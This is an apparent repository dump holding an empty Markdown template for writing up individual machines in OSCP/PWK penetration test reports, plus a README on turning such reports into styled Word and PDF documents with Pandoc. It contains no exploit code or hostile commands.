    "content": "## System IP XXX.XXX.XXX.XXX (HOSTNAME)\r\n\r\n### System overview\r\n\r\n|                   |                 |\r\n|-------------------|-----------------|\r\n| IP Address        | 192.168.255.255 |\r\n| Hostname          | ExampleName     |\r\n| Exploitation Date | 99-99-9999      |\r\n| Point Value       | 25              |\r\n\r\n### Exploitation Overview\r\n\r\n<!-- Provide a brief description of the vulnerabilities and exploitation process -->\r\n\r\n### Service Enumeration\r\n\r\n#### Portscan - TCP\r\n\r\n```plaintext\r\n\r\n```\r\n\r\n#### Portscan - UDP \r\n<!-- Remove if not applicable -->\r\n```plaintext\r\n\r\n```\r\n\r\n### Network interfaces\r\n\r\n```plaintext\r\n\r\n```\r\n\r\n### Credentials\r\n\r\n```plaintext\r\n\r\n```\r\n\r\n### Exploitation and proof\r\n\r\n#### Initial access\r\n\r\n##### Vulnerability exploitation\r\n\r\n##### Severity\r\n\r\n##### Remediation\r\n\r\n##### Proof\r\n\r\n#### Privilege Escalation\r\n\r\n##### Vulnerability exploitation\r\n\r\n##### Severity\r\n\r\n##### Remediation\r\n\r\n##### Proof\r\n\r\n### Miscellaneous notes\r\n<!-- Use this section to keep notes for yourself (e.g. loose ends, interesting intermediary findings, etc.), optionally remove it before merging with the master report -->\r\n\r\n### Reporting checklist\r\n<!-- Remove before merging with the master report -->\r\n- [ ] Are screenshots of the proof files together with `ipconfig/ifconfig/ip a` included?\r\n- [ ] Is all *modified* source code included?\r\n- [ ] Are all relevant exploits referenced?\r\n- [ ] Are all steps reproducible?"
  },
  {
    "path": "README.md",
    "content": "# OSCP / PWK Markdown Reporting Templates and Pandoc Reference Style\r\n\r\nI wrote [a blog post](https://casvancooten.com/posts/2020/05/generating-pretty-pwk-reports-with-pandoc-and-markdown-templates-inside/) on how to use these templates to easily generate pretty reports with little effort.\r\n\r\nThis repo contains the templates I used for OSCP / PWK lab and exam reporting, as well as the basic styles I used to convert the markdown report to a (relatively) slick-looking and organized report, while preserving code formatting and syntax highlighting. To achieve this I generate the PDF based on an intermediary Word file generated through Pandoc.\r\n\r\nThe repo also contains some [examples](https://github.com/chvancooten/OSCP-MarkdownReportingTemplates/tree/master/Examples) to show what a report may come to look like. Note that the final conversion from Word to PDF does require some manual styling work (which is actually what I personally preferred). Since I obviously cannot disclose any PWK lab or exam writeups, I've used some VulnHub writeups as filler instead. Don't open the example report if you don't want spoilers for `Brainpan`, `Kioptrix2014`, `Zico`, or `LazyAdmin`. 🙃\r\n\r\n## Requirements\r\n\r\n- A Markdown editor of your choosing\r\n- [Pandoc](https://pandoc.org/)\r\n- `1337 hacking skillz`\r\n\r\n## How to use\r\n\r\n### Preparing markdown report\r\n\r\nThe markdown templates are fairly straightforward. I strongly recommend using a Markdown editor that has decent backup / synchronization features as well as a feature to copy and paste screenshots (must-have IMO). I used [Joplin](https://joplinapp.org/) as a daily editor, and [VS Code](https://code.visualstudio.com/docs/languages/markdown) to compile and streamline the final report.\r\n\r\nWhile doing the labs or exam, I would recommend keeping separate write-ups per machine, based on the template you aim to use for reporting. 
Once you are happy with your separate machine write-ups and ready to compile them into a report, export your markdown files (if needed) and ensure that all the images are intact. Then, compile a master document with an appropriate introduction to, and summary of, your work. For this I have included the Lab and Exam Report templates, which are based on OffSec's own reporting templates.\r\n\r\n### Preparing `reference.docx` for custom styling (optional)\r\n\r\nThe `reference.docx` file determines the basic styling of your intermediate Word document. I have included an example file which covers all the styles, but you can generate and adapt your own if you want.\r\n\r\nYou can export a reference file as follows:\r\n\r\n```\r\npandoc --print-default-data-file reference.docx > custom-reference.docx\r\n```\r\n\r\nEdit the styles embedded in the document as desired to determine how Pandoc will generate your report.\r\n\r\n> Don't overlook the many important styles (such as \"source code\") that are hidden; you can see the full overview by clicking the \"box-with-arrow\" on the bottom right of the styling section in Word, and edit the styles from there.\r\n\r\n### Generating intermediate .docx report\r\n\r\nTo maintain full control of the output report, I worked with an intermediate report in Word format. You can generate this report as follows. [This article](https://www.garrickadenbuie.com/blog/pandoc-syntax-highlighting-examples/) has a nice and visual representation of the different syntax highlighting styles that Pandoc offers by default.\r\n\r\n```\r\npandoc \"Example Report _ No Styling.md\" -o output.docx --highlight-style=tango --reference-doc=./custom-reference.docx\r\n```\r\n\r\n![Generating the docx report](./_resources/GeneratingReport.png)\r\n\r\n### Finalizing the report\r\n\r\nThe pandoc reference document covers a lot of the styling, but not everything that I wanted it to. 
As such, I adapted the following manually to ensure that the output document is nice and sleek:\r\n\r\n- Title page formatting\r\n- Table of contents\r\n- Page numbering\r\n- Image sizes\r\n  - Since Pandoc renders images at page width by default, some images come out really big depending on the aspect ratio of the original image. This could be solved by using something like `![my caption](./figures/myimage.png){ width=250px }` in your original Markdown file, but I prefer going through and manually resizing images to the right size.\r\n\r\nOf course, this is up to your preference! At this point you can tweak your styles or formatting as you desire.\r\n\r\n### Exporting PDF\r\n\r\nOffSec expects your report in PDF format. Generating that from Word shouldn't be much of a hurdle though. ;)\r\n"
  }
]